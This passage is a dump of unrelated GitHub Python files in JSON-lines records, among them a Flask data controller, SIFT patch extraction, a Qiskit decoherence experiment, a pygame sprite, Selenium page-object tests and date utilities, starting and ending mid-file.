else:\r\n print('Número de comunidade inválido!')\r\n\r\ndef comunidade():\r\n armazenar_dados = carregar_dados()\r\n exibir_menu(armazenar_dados)\r\n\r\n opcao = int(input('Digite a opção desejada: '))\r\n if 1 <= opcao <= len(armazenar_dados):\r\n comunidades = list(armazenar_dados.keys())\r\n comunidade_escolhida = comunidades[opcao - 1]\r\n nome_pessoa = input('Digite o seu nome: ')\r\n print(\r\n f'{nome_pessoa}, você é um novo membro da comunidade {comunidade_escolhida}!')\r\n armazenar_dados[comunidade_escolhida]['Quantidade de Pessoas'] += 1\r\n armazenar_dados[comunidade_escolhida]['Membros'].append(nome_pessoa)\r\n elif opcao == len(armazenar_dados) + 1:\r\n nome_comunidade = input('Digite o nome da nova comunidade: ')\r\n if nome_comunidade not in armazenar_dados:\r\n armazenar_dados[nome_comunidade] = {'Quantidade de Pessoas': 1, 'Membros': []}\r\n print(f'Você é um novo membro da comunidade {nome_comunidade}!')\r\n else:\r\n print(f'A comunidade {nome_comunidade} já existe!')\r\n elif opcao == len(armazenar_dados) + 2:\r\n visualizar_membros(armazenar_dados)\r\n else:\r\n print('Opção inválida!')\r\n\r\n salvar_dados(armazenar_dados)\r\n\r\n\r\ninicio()\r\n\r\n","repo_name":"xjuveri/ProjetoE-stuario","sub_path":"projetos.py","file_name":"projetos.py","file_ext":"py","file_size_in_byte":12332,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73572210084","text":"from flask import Blueprint, request, jsonify, make_response\nfrom App.Domain.Analisis.datos_generales import obtener_departamentos_y_municipios_colegios,\\\n total_registros_niveles_desempeno_por_calendario, probabilidad_puntaje\nfrom App.Domain.General.cambiar_datasets import cambiar_datasets\n\ngeneralData = Blueprint('general_data', __name__)\n\n\n@generalData.route('/datos-generales/departamentos-municipios-cole')\ndef obtener_departamentos_y_municipios():\n data = request.args\n print(\"Departamentos y municipio periodo\",data.get('periodo',''))\n result = obtener_departamentos_y_municipios_colegios(int(data.get('periodo','')))\n return make_response(jsonify(result), 
200)\n\n\n@generalData.route('/datos-generales/promedios-desempenos')\ndef obtener_promedios_y_desempenos():\n data = request.args\n print(data)\n result = total_registros_niveles_desempeno_por_calendario(data.get('calendario'),\n data.get('departamento'),\n data.get('municipio'),\n data.get('colegio'))\n return make_response(jsonify(result), 200)\n\n\n@generalData.route('/datos-generales/probabilidad-puntaje')\ndef probabilidad_de_puntaje():\n data = request.args\n result = {\n \"respuesta\": probabilidad_puntaje(\n int(data.get('periodo', '')),\n data.get('puntaje', ''),\n int(data.get('limite_inf', '')),\n int(data.get('limite_sup', '')),\n data.get('departamento'),\n data.get('municipio'),\n )\n }\n return make_response(jsonify(result), 200)\n\n\n@generalData.route('/datos-generales/cambiar-datasets')\ndef cambiar_datasets_endpoint():\n data = request.args\n booleano = data.get('depurar') == 'true'\n result = {\n \"respuesta\": cambiar_datasets(\n booleano,\n )\n }\n return make_response(jsonify(result), 200)\n","repo_name":"lkavila/Saber11Api","sub_path":"App/Controllers/General/general_controller.py","file_name":"general_controller.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69885427365","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\"\"\"\nimport torch\nimport scipy.integrate\nimport numpy as np\nimport os, sys\nimport matlab.engine\n\nif sys.platform.startswith('win'): # sys.platform is 'win32' on Windows\n bar = '\\\\'\nelse:\n bar = '/'\n\ndef matlab_interface(): # creates Matlab-Python interface\n parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n sys.path.append(parent_dir) \n eng = matlab.engine.start_matlab()\n eng.addpath(parent_dir + bar + \"SimulationFramework\", nargout= 0)\n eng.addpath(parent_dir + bar + \"SimulationFramework\" + bar + \"background\", \n nargout= 0)\n eng.addpath(parent_dir + bar + \"SimulationFramework\" + bar + \"background\" \n + bar + \"utils\", nargout= 0)\n eng.addpath(parent_dir + bar + \"SimulationFramework\" + bar + \"background\"\n + bar + \"CrossSectionData\", nargout= 0)\n eng.addpath(parent_dir + bar + \"SimulationFramework\" + bar + \"test_results\",\n nargout= 0)\n return eng\n\n\nclass ObjectView(object): # simplifies accessing the hyperparameters\n def __init__(self, d): \n self.__dict__ = d\n \n\ndef integrate_model(model, t_span, y0, use_torch=True, **kwargs): # integrates the generated NN models over time\n def fun(t, x):\n if use_torch:\n x = torch.tensor(x, requires_grad=True, \n dtype=torch.float32).reshape(1,len(y0))\n t = torch.zeros_like(x[...,:1])\n else:\n x = x.reshape(1,len(y0))\n t = np.zeros_like(x[...,:1])\n dx = model(x, t=t).reshape(-1)\n if use_torch:\n dx = dx.data.numpy()\n return dx\n return scipy.integrate.solve_ivp(fun=fun, t_span=t_span, y0=y0, **kwargs)\n\n\ndef normalize(data_raw, x_denorm, norm_range): # normalizes the features\n x_norm = np.empty(x_denorm.shape)\n n_DoF = int(x_norm.shape[1]/2)\n for i in range(n_DoF):\n # x_norm[:,i] = (x_denorm[:,i] - np.min(data_raw[:,:]))/np.ptp(data_raw) \n x_norm[:,i] = np.ptp(norm_range)*(x_denorm[:,i] - np.min(data_raw[:,:n_DoF]))/np.ptp(data_raw[:,:n_DoF]) + norm_range[0] \n x_norm[:,n_DoF+i] = np.ptp(norm_range)*(x_denorm[:,n_DoF+i] - np.min(data_raw[:,n_DoF:]))/np.ptp(data_raw[:,n_DoF:]) + norm_range[0] \n return x_norm\n\n\ndef denormalize(data_raw, x_norm, norm_range): # denormalizes the features\n x_denorm = np.empty(x_norm.shape)\n n_DoF = int(x_denorm.shape[1]/2)\n for i 
in range(n_DoF):\n # x_denorm[:,i] = x_norm[:,i]*np.ptp(data_raw) + np.min(data_raw)\n x_denorm[:,i] = (x_norm[:,i] - norm_range[0])*np.ptp(data_raw[:,:n_DoF])/np.ptp(norm_range) + np.min(data_raw[:,:n_DoF])\n x_denorm[:,n_DoF+i] = (x_norm[:,n_DoF+i] - norm_range[0])*np.ptp(data_raw[:,n_DoF:])/np.ptp(norm_range) + np.min(data_raw[:,n_DoF:])\n return x_denorm\n\n\ndef standardize(data_raw, x_destand): # standardize the features\n x_stand = np.empty(x_destand.shape)\n for i in range(x_destand.shape[1]):\n x_stand[:,i] = (x_destand[:,i] - np.mean(data_raw[:,i]))/np.std(data_raw[:,i]) \n return x_stand\n\n\ndef destandardize(data_raw, x_stand): # destandardizes the features\n x_destand = np.empty(x_stand.shape)\n for i in range(x_destand.shape[1]):\n x_destand[:,i] = x_stand[:,i]*np.std(data_raw[:,i]) + np.mean(data_raw[:,i]) \n return x_stand\n \n\ndef post_process(X_sol, data_raw, model_param, *args):\n for arg in args:\n phi_r = arg\n if model_param.normalize: # denormalizes/destandardizes solution (if enabled):\n X = denormalize(data_raw['x'], X_sol, model_param.norm_range)\n if model_param.model == 'FOM':\n p, q = np.split(X, 2, axis=1) \n elif model_param.model == 'ROM': \n etap, eta = np.split(X, 2, axis=1)\n p, q = (phi_r@etap.T).T, (phi_r@eta.T).T\n elif model_param.standardize: \n X = destandardize(data_raw['x'], X_sol)\n if model_param.model == 'FOM':\n p, q = np.split(X, 2, axis=1) \n elif model_param.model == 'ROM': \n etap, eta = np.split(X, 2, axis=1)\n p, q = (phi_r@etap.T).T, (phi_r@eta.T).T \n else: \n X = X_sol\n if model_param.model == 'FOM':\n p, q = np.split(X, 2, axis=1) \n elif model_param.model == 'ROM': \n etap, eta = np.split(X, 2, axis=1)\n p, q = (phi_r@etap.T).T, (phi_r@eta.T).T\n return p, q\n \n \n \n\n\n\n\n \n","repo_name":"borgessv/MSc-Thesis","sub_path":"NN/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27258250195","text":"import cv2\nimport numpy as np\nfrom joblib import Parallel, delayed\nimport multiprocessing\nimport os\nimport glob\nimport logging\nimport sklearn.preprocessing\nfrom sklearn.decomposition import PCA\nfrom tqdm import tqdm\n\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP', '.tif', '.tiff', '.TIF', '.TIFF'\n]\n\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\ndef edge_pixels(mask):\n return np.sum(mask == 255)\n\ndef calc_features(input_img, arguments):\n img = cv2.imread(input_img)\n\n if arguments.scale != -1:\n scale = arguments.scale\n height = img.shape[0] * scale\n width = img.shape[1] * scale\n new_size_mask = (int(width), int(height))\n img = cv2.resize(img, new_size_mask, interpolation=cv2.INTER_CUBIC)\n\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n mask = cv2.Canny(img, 30, 200)\n\n sift = cv2.SIFT_create(sigma=args.sigma)\n kp = sift.detect(img_gray, None)\n\n\n def filter_keypoint(point):\n # if 3 < point.size < 10:\n # return point\n return point\n\n\n new_kp = []\n uniq_kp = []\n\n num_pixel = arguments.win_size ** 2 \n\n for p in kp:\n point = (int(p.pt[0]), int(p.pt[1]))\n\n roi = get_image_patch(img, point[0], point[1], arguments)\n mask_roi = get_image_patch(mask, point[0], point[1], arguments)\n\n if roi is None:\n continue\n\n if arguments.edge_pixels != -1:\n if edge_pixels(mask_roi) < (arguments.edge_pixels * num_pixel):\n continue \n\n if not point in 
uniq_kp and filter_keypoint(p):\n new_kp.append(p)\n uniq_kp.append(point)\n\n # print(f'{len(new_kp)} kps for {input_img}')\n _, desc = sift.compute(img_gray, new_kp)\n\n if not new_kp:\n desc = np.zeros((1,128))\n kp_tupple = [( (int(img.shape[1]/2), int(img.shape[0]/2)), desc)]\n print(f'Nothing found for {input_img}')\n return kp_tupple\n\n desc = sklearn.preprocessing.normalize(desc, norm='l1')\n desc = np.sign(desc) * np.sqrt(np.abs(desc))\n desc = sklearn.preprocessing.normalize(desc, norm='l2')\n\n kp_tupple = [(p, desc[i]) for i, p in enumerate(uniq_kp)]\n\n\n return kp_tupple\n\n\ndef get_image_patch(img, px, py, arguments):\n half_win_size = int(arguments.win_size / 2)\n if not (half_win_size < px < img.shape[1] - half_win_size and half_win_size < py < img.shape[0] - half_win_size):\n return None\n\n roi = img[py - half_win_size:py + half_win_size, px - half_win_size:px + half_win_size]\n assert roi.shape[:2] == (half_win_size * 2, half_win_size * 2), 'shape of the roi is not (%d,%d). It is (%d,%d)' % \\\n (half_win_size * 2, half_win_size * 2,\n roi.shape[0], roi.shape[1])\n return roi\n\n\ndef extract_patches(filename, tup, args):\n if len(tup) > args.patches_per_page and args.patches_per_page != -1:\n idx = np.linspace(0, len(tup) - 1, args.patches_per_page, dtype=np.int32)\n tup = [tup[i] for i in idx]\n\n points, _ = zip(*tup)\n\n img = cv2.imread(filename)\n\n if args.scale != -1:\n scale = args.scale\n height = img.shape[0] * scale\n width = img.shape[1] * scale\n new_size_mask = (int(width), int(height))\n img = cv2.resize(img, new_size_mask, interpolation=cv2.INTER_CUBIC)\n\n\n count = 0\n for p in points:\n roi = get_image_patch(img, p[0], p[1], args)\n if roi is None:\n continue\n \n out_path = os.path.join(args.out_dir[0], os.path.splitext(os.path.basename(filename))[0],\n os.path.splitext(os.path.basename(filename))[0] + '_' + str(count) + '.png')\n\n count = count + 1\n cv2.imwrite(out_path, roi)\n\n\nif __name__ == \"__main__\":\n import argparse\n import pickle\n\n logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(message)s ')\n\n parser = argparse.ArgumentParser(description=\"extract patches from images\")\n parser.add_argument('--in_dir', metavar='in_dir', dest='in_dir', type=str, nargs=1,\n help='input directory', required=True)\n parser.add_argument('--out_dir', metavar='out_dir', dest='out_dir', type=str, nargs=1,\n help='output directory', required=True)\n parser.add_argument('--win_size', metavar='win_size', dest='win_size', type=int, nargs='?',\n help='size of the patch',\n default=32)\n parser.add_argument('--patches_per_page', metavar='patches_per_page', dest='patches_per_page', type=int, nargs='?',\n help='maximal number of patches per page (-1 for no limit)',\n default=-1)\n parser.add_argument('--scale', type=float, help='scale images up or down',\n default=-1)\n parser.add_argument('--sigma', type=float, help='blur factor for SIFT',\n default=1.6)\n parser.add_argument('--edge_pixels', type=float, help='if more black_pixel_thresh percent of the pixels are black -> discard',\n default=0.1)\n \n args = parser.parse_args()\n\n\n assert os.path.exists(args.in_dir[0]), 'in_dir {} does not exist'.format(args.in_dir[0])\n\n\n if not os.path.exists(args.out_dir[0]):\n logging.info('creating directory %s' % args.out_dir[0])\n os.mkdir(args.out_dir[0])\n\n assert len(os.listdir(args.out_dir[0])) == 0, 'out_dir is not empty'\n\n assert args.win_size % 2 == 0, 'win_size must be even'\n\n num_cores = int(multiprocessing.cpu_count() / 
2)\n num_cores = 10\n path_to_centers = ''\n\n def chunks(xs, n):\n n = max(1, n)\n return (xs[i:i+n] for i in range(0, len(xs), n))\n\n files = [f for f in glob.glob(args.in_dir[0] + '/**/*.*', recursive=True) if os.path.isfile(f) and is_image_file(f)]\n\n file_lists = list(chunks(files, 5000))\n logging.info(f'{len(list(file_lists))} lists')\n\n for files in file_lists:\n logging.info(files)\n assert len(files) > 0, 'no images found'\n logging.info('Found {} images'.format(len(files)))\n\n logging.info('calculating features for images in %s (number of cores:%d)' % (args.in_dir, num_cores))\n results = []\n\n results = Parallel(n_jobs=num_cores, verbose=9)(delayed(calc_features)(f, args) for f in files)\n\n logging.info('collecting descriptors')\n desc_list = []\n kp_list = []\n fn_list = []\n\n for r, f in tqdm(zip(results, files)):\n if len(r) == 0:\n logging.warning('no keypoints found in file {} '.format(f))\n for kp, desc in r:\n kp_list.append(kp)\n desc_list.append(desc)\n fn_list.append(f)\n\n logging.info('creating labels directories in output directory')\n for fn in set(fn_list):\n f_name = os.path.splitext(os.path.basename(fn))[0]\n if not os.path.exists(os.path.join(args.out_dir[0], str(f_name))):\n os.mkdir(os.path.join(args.out_dir[0], str(f_name)))\n\n # logging.info('copying %i (all patches per page) image patches to %s ' % (kp_list, args.out_dir[0]))\n results = Parallel(n_jobs=num_cores, verbose=9)(\n delayed(extract_patches)(filename, tup, args) for filename, tup in zip(files, results))\n\n config_out_path = os.path.join(args.out_dir[0], 'db-creation-parameters.json')\n logging.info('writing config parameters to {}')\n with open(config_out_path, 'w') as f:\n import json\n\n json.dump(vars(args), f)\n\n out_files = [f for f in glob.glob(args.out_dir[0] + '/**/*.*', recursive=True) if os.path.isfile(f) and is_image_file(f)]\n logging.info(f'done - extracted {len(out_files)} patches')","repo_name":"marco-peer/icdar23","sub_path":"helpers/extract_patches_only_color.py","file_name":"extract_patches_only_color.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"39960553852","text":"#########################################################################################\n# Idea from https://medium.com/qiskit/getting-to-know-your-quantum-processor-ea418867615f\n#########################################################################################\n\nimport matplotlib.pyplot as plt\nfrom qiskit import Aer, QuantumCircuit, execute, IBMQ, QuantumRegister, ClassicalRegister\nfrom qiskit.visualization import plot_gate_map, plot_error_map\nfrom qiskit.tools.monitor import job_monitor\nimport math\nimport random\n\nnb_qubits = 10\nnb_decoherence = 5\n\nrandom_circuit = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\nrandom.shuffle(random_circuit)\n\n# Init Qasm simulator backend\nqasm = Aer.get_backend('qasm_simulator')\n\n# Init Real Quantum computer\nIBMQ.load_account()\nprovider = IBMQ.get_provider('ibm-q')\nquantum_computer = provider.get_backend('ibmq_16_melbourne')\n\nbackend_sim = quantum_computer # Choose your backend : or \n\n#########################################################\n#########################################################\n# #Circuit\n\n# Quantum Circuit\nq = QuantumRegister(nb_qubits + nb_decoherence, \"game\")\nc = ClassicalRegister(nb_qubits + nb_decoherence)\n\nqc = QuantumCircuit(q, c)\n\n# print(\"00 --A-- 01 --B-- 02 --C-- 03 --D-- 04 --E-- 05 --F-- 06\\n\"\n# 
\" | | | | | | |\\n\"\n# \" U T S R Q P O\\n\"\n# \" | | | | | | |\\n\"\n# \"14 --N-- 13 --M-- 12 --L-- 11 --K-- 10 --J-- 09 --I-- 08 --H-- 07\")\n\nplot_gate_map(quantum_computer)\n# plt.show()\n\n# Make random pairing\nqubit_decoherence = nb_qubits\nfor i in range(0, nb_qubits):\n if i % 2 == 0:\n qc.rx(math.pi / 2, q[i])\n qc.cx(q[i], q[i + 1])\n qc.ccx(q[i], q[i + 1], q[qubit_decoherence])\n qubit_decoherence += 1\n\nqc.measure(range(nb_qubits + nb_decoherence), range(nb_qubits + nb_decoherence))\n\n# # Drawing the circuit\nqc.draw(output='mpl')\n# plt.show()\n# print(qc)\n\n#########################################################\n#########################################################\n# #Simulating\n\njob = execute(qc, backend_sim, shots=1024, optimization_level=3)\njob_monitor(job)\n\n# Result job\nresult_sim = job.result()\ncounts = result_sim.get_counts()\n\n#########################################################\n#########################################################\n# #Results\n\nvalue_q = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\nfor x in range(0, nb_qubits + nb_decoherence):\n for key in counts:\n if key[x] == \"1\":\n value_q[x] += (1 * int(counts[key]))\n\nvalue_q.reverse()\n\ndef calculus_differencial(value_q):\n # Calculus link between each qubit\n link = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\"]\n for letter in range(0, 10):\n if 0 <= letter < 6:\n link[letter] = abs(abs(value_q[letter]) - abs(value_q[letter + 1]))\n elif 7 <= letter < 9:\n link[letter] = abs(abs(value_q[letter]) - abs(value_q[letter + 1]))\n if 8 <= letter <= 9:\n link[letter + 1] = abs(abs(value_q[letter]) - abs(value_q[nb_qubits - letter + 4]))\n\n print(\"\",value_q[0],\" -- \",link[0],\" -- \",value_q[1],\" -- \",link[1],\" -- \",value_q[2],\" -- \",link[2],\" -- \",value_q[3],\" -- \",link[3],\" -- \",value_q[4],\" -- \",link[4],\" -- \",value_q[5],\" -- \",link[5],\" -- \",value_q[6],\"\\n\"\n \" | |\\n\"\n \" \",link[10],\" \",link[9],\"\\n\"\n \" | |\\n\"\n \" \",value_q[9],\" -- \",link[8],\" -- \",value_q[8],\" -- \",link[7],\" -- \",value_q[7])\n\n return 0\ncalculus_differencial(value_q)\n\nprint(\"Value qubits : \", value_q)\n\nif backend_sim == quantum_computer:\n plot_error_map(quantum_computer)\n qubit_decoherence = nb_qubits\n value_decoherence = [0, 0, 0, 0, 0]\n for i in range(0, nb_qubits):\n if i % 2 == 0:\n value_decoherence[qubit_decoherence - 10] = ((value_q[qubit_decoherence] - value_q[i]) + (value_q[qubit_decoherence] - value_q[i + 1])) / 512\n print(\"q\", i, \"[\", value_q[qubit_decoherence], \"-\", value_q[i], \"] + q\", i + 1, \"[\", value_q[qubit_decoherence], \"-\", value_q[i + 1], \"] => \", (value_q[qubit_decoherence] - value_q[i]) + (value_q[qubit_decoherence] - value_q[i + 1]), \"/ 512 = \", value_decoherence[qubit_decoherence - 10])\n qubit_decoherence += 1\n\n value_q[i] *= 1 + value_decoherence[qubit_decoherence - nb_qubits - 1]\n value_q[i] = round(value_q[i])\n\n calculus_differencial(value_q)\n\n# # Show the results\n# print(counts)\n# plot_histogram(counts)\nplt.show()\n","repo_name":"mickahell/quantum_experiments","sub_path":"qiskit/qubits-system/correction_decoherence.py","file_name":"correction_decoherence.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"24877511334","text":"import pygame as pg\r\n\r\nfrom vars import 
WIDTH\r\n\r\n\r\nclass Sprite(pg.sprite.Sprite):\r\n def __init__(self, groups: pg.sprite.Group, image):\r\n super().__init__(groups)\r\n\r\n self.image = pg.image.load(image)\r\n self.rect = self.image.get_rect()\r\n self.leftPressed, self.rightPressed = False, False\r\n self.h_speed = 30\r\n\r\n self.collected_ingredients = []\r\n self.rect.x = 500\r\n\r\n def draw(self, screen):\r\n # print(help(self.image))\r\n screen.blit(self.image, (self.rect.x, 450))\r\n\r\n def handle_input(self, event):\r\n if event.type == pg.KEYDOWN:\r\n if event.key == pg.K_LEFT:\r\n self.leftPressed = True\r\n elif event.key == pg.K_RIGHT:\r\n self.rightPressed = True\r\n\r\n elif event.type == pg.KEYUP:\r\n if event.key == pg.K_LEFT:\r\n self.leftPressed = False\r\n elif event.key == pg.K_RIGHT:\r\n self.rightPressed = False\r\n\r\n def update(self):\r\n if self.rect.x < 0:\r\n self.rect.x = 5\r\n elif self.rect.x > WIDTH:\r\n self.rect.x = WIDTH - 300\r\n\r\n if self.leftPressed and not self.rightPressed:\r\n self.rect.x -= self.h_speed\r\n elif self.rightPressed and not self.leftPressed:\r\n self.rect.x += self.h_speed\r\n","repo_name":"nathan-the-coder/Survival-Cook","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37895580816","text":"import time\nfrom framework.base_page import BasePage\n\n\nclass PrivateManager(BasePage):\n \"\"\"Private fund manager detail page\"\"\"\n\n homepage = 'xpath=>//*[@id=\"navUl\"]/li[1]/a' # home page\n username = 'xpath=>//*[@id=\"userName\"]' # phone number\n password = 'xpath=>//*[@id=\"password\"]' # password\n button = 'xpath=>//*[@id=\"btnSubmit\"]' # log in\n pre_screening = 'xpath=>//*[@id=\"navUl\"]/li[3]/span' # pre-investment screening\n fund_manager = 'xpath=>//*[@id=\"navUl\"]/li[3]/ul/li[3]/a' # fund manager\n key_word = 'xpath=>//*[@id=\"keyword\"]' # keyword\n sure = 'xpath=>//*[@id=\"pubconfirmBtn\"]' # confirm\n details = 'xpath=>//*[@id=\"main-grid\"]/tbody/tr[1]/td[2]/a' # fund manager link\n y1_manager = 'xpath=>//*[@id=\"lastYear\"]' # past year\n y1_rank = 'xpath=>//*[@id=\"indexanalysis\"]/button[3]' # past year\n y1_risk = 'xpath=>//*[@id=\"rankingDate2\"]/button[2]' # past year\n super_yield = 'xpath=>//*[@id=\"profit\"]/option[2]' # excess annualized return\n bate_coefficient = 'xpath=>//*[@id=\"change\"]/option[4]' # beta coefficient\n up_list = 'xpath=>//*[@id=\"incomeUl\"]/li[2]' # liquidated funds\n fund_link = 'xpath=>//*[@id=\"rateindicatorsCharts\"]/tbody/tr[1]/td[1]/a' # fund link\n mechanism_link = 'xpath=>//*[@id=\"institutions\"]/span' # affiliated institution link\n\n def private_manager_login(self):\n \"\"\"Log in\"\"\"\n self.click(self.homepage)\n time.sleep(2)\n self.type(self.username, '15107045860')\n time.sleep(2)\n self.type(self.password, '045860')\n time.sleep(2)\n self.click(self.button)\n time.sleep(2)\n self.click(self.pre_screening)\n time.sleep(2)\n self.click(self.fund_manager)\n time.sleep(5)\n\n def private_manager_details(self):\n \"\"\"Header\"\"\"\n self.type(self.key_word, '赵军')\n time.sleep(3)\n self.click(self.sure)\n time.sleep(8)\n self.click(self.details)\n time.sleep(5)\n\n def private_manager_profit(self):\n \"\"\"Cumulative return\"\"\"\n self.click(self.y1_manager)\n time.sleep(5)\n\n def private_manager_rank(self):\n \"\"\"Peer ranking\"\"\"\n self.click(self.y1_rank)\n time.sleep(5)\n\n def private_manager_risk(self):\n \"\"\"Return/risk ratio\"\"\"\n self.click(self.y1_risk)\n time.sleep(8)\n self.click(self.super_yield)\n time.sleep(8)\n self.click(self.bate_coefficient)\n time.sleep(8)\n\n def private_manager_list(self):\n \"\"\"Product list\"\"\"\n self.click(self.up_list)\n 
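# Every step in the page object above is paced with fixed time.sleep() calls;
# a hedged sketch of the usual alternative, an explicit wait, under the
# assumption that BasePage wraps Selenium WebDriver. `wait_click` is a
# hypothetical helper written for illustration, not part of the BasePage API.
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait

def wait_click(driver, xpath, timeout=10):
    # Block until the element is clickable, then click it; raises
    # TimeoutException if the condition is never met within `timeout`.
    element = WebDriverWait(driver, timeout).until(
        EC.element_to_be_clickable((By.XPATH, xpath)))
    element.click()
    return element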
time.sleep(5)\n self.click(self.fund_link)\n time.sleep(5)\n\n def private_manager_info(self):\n \"\"\"Basic information\"\"\"\n self.click(self.mechanism_link)\n time.sleep(5)\n\n","repo_name":"Testwjm/test_fram","sub_path":"pageobjects/private_manager.py","file_name":"private_manager.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"75100066083","text":"#!/usr/bin/env python3\n\"\"\"\ntask_wait_n: an async routine called task_wait_n that takes in\n 2 int arguments (in this order): n and max_delay.\n It will spawn task_wait_random n times with the\n specified max_delay.\n\"\"\"\n\n\nimport asyncio\nfrom typing import List\nimport random\ntask_wait_random = __import__('3-tasks').task_wait_random\n\n\nasync def task_wait_n(n: int, max_delay: int = 10) -> List[float]:\n \"\"\"\n spawns task_wait_random n times and returns a list of all delays\n concurrently\n \"\"\"\n\n tasks = [task_wait_random(max_delay) for i in range(n)]\n\n delays = []\n\n while len(tasks):\n done, tasks = await asyncio.wait(tasks,\n return_when=asyncio.FIRST_COMPLETED)\n for task in done:\n delay = task.result()\n delays.append(delay)\n return delays\n","repo_name":"JeremyWarui/alx-backend-python","sub_path":"0x01-python_async_function/4-tasks.py","file_name":"4-tasks.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"306389509","text":"# mydate.py\n# Author: Kevin Tran\n# Course: Data Management w/ Prof. Versoza\n\nimport random\n\n\ndef is_valid_month_num(n):\n#params: n = integer 1-12 representing month\n#return: boolean, True if n is between 1-12\n\n try:\n validParam = int(n)\n if ((validParam >= 1) and (validParam <= 12)):\n return True\n else:\n return False\n\n except (TypeError, ValueError):\n print(\"Invalid parameter.\")\n return False\n\n\ndef month_num_to_string(month_num):\n#params: integer 1-12 representing month\n#return: month name as string\n\n if (is_valid_month_num(month_num) == False):\n return None\n\n else:\n months = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\n\n return months[month_num - 1]\n\n\n\ndef date_to_string(date_list):\n#params: 3 element list [year, month, day]\n#return: string version of date_list\n\n day = str(date_list[2])\n month = month_num_to_string(date_list[1])\n year = date_list[0]\n\n return (\"{0} {1}, {2}\".format(month, day, year))\n\n\ndef dates_to_strings(list_of_date_lists):\n#params: [[year, month, day], [year, month, day], ...]\n#return: [['January 1, 2000'], ...]\n\n\n return list(map(date_to_string, list_of_date_lists))\n\n\ndef remove_years(list_of_date_lists):\n#params: [[year, month, day], [year, month, day], ...]\n#return: [[month, day], [month, day]]\n for date in list_of_date_lists:\n del date[0]\n\n return list_of_date_lists\n\n\ndef is_leap_year(year):\n#params: int year\n#return: boolean, True if leap year\n if (year % 4 == 0):\n if (year % 100 == 0):\n if (year % 400 == 0):\n return True\n else:\n return False\n else:\n return True\n else:\n return False\n\n\n\ndef get_num_days_in_month(month_num, year):\n#params: int month, int year\n#return: int number of days for the month, factoring in leap years\n\n days_in_months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n if (is_valid_month_num(month_num)):\n\n if (is_leap_year(year)):\n february_days = days_in_months[1] + 
1\n if (month_num == 2):\n return february_days\n\n return days_in_months[month_num - 1]\n\n else:\n return days_in_months[month_num - 1]\n\n\n\ndef generate_date(start_year, end_year):\n#params: int year, int max year\n#return: randomized date [year, month num, day]\n\n year = random.randint(start_year, end_year)\n month = random.randint(1, 12)\n day = random.randint(1, get_num_days_in_month(month,year))\n\n\n if(is_leap_year(year)):\n if(month == 2):\n day = random.randint(1, 29)\n\n\n return [year, month, day]\n\n\ndef duplicate(list_birthdays): #extra function\n#params: list of birthdays\n#return: list of duplicate birthdays, unique values only\n array = []\n dupes = []\n for i in range(len(list_birthdays)):\n if (list_birthdays[i] not in array):\n array.append(list_birthdays[i])\n elif (list_birthdays[i] not in dupes): #prevent repeats\n dupes.append(list_birthdays[i])\n\n\n return(dupes)\n","repo_name":"tranvk/DBManagement","sub_path":"Pronouns_Birthdays/mydate.py","file_name":"mydate.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29245011565","text":"# -*- coding: utf-8 -*-\n# @Author: Kajol.Patira\n# @Date: 2021-01-04 19:07:33\n# @Last Modified by: Kajol.Patira\n# @Last Modified time: 2021-01-04 19:47:07\n# @Title: Accepts a sequence of numbers from user and generate a list and a tuple with those numbers.\n\n# function to generate list and tuple\ndef list_tuple():\n values = input(\"Enter some comma seperated values: \")\n lists = values.split(\",\")\n tuples = tuple(lists)\n print(\"List: \", lists)\n print(\"Tuple: \", tuples)\n\nlist_tuple()","repo_name":"Kajol7052/Week2_Data-Structures_Fellowship","sub_path":"Basic_Python/list_and_tuple.py","file_name":"list_and_tuple.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18604883166","text":"__all__ = ('DIRECTIONS', 'INPUT', 'OUTPUT',\n 'EDGES', 'RISING', 'FALLING', 'BOTH',\n 'Controller')\n\nimport errno\nimport os\nimport select\n\nfrom twisted.internet import reactor\n\nimport logging\n\nLogger = 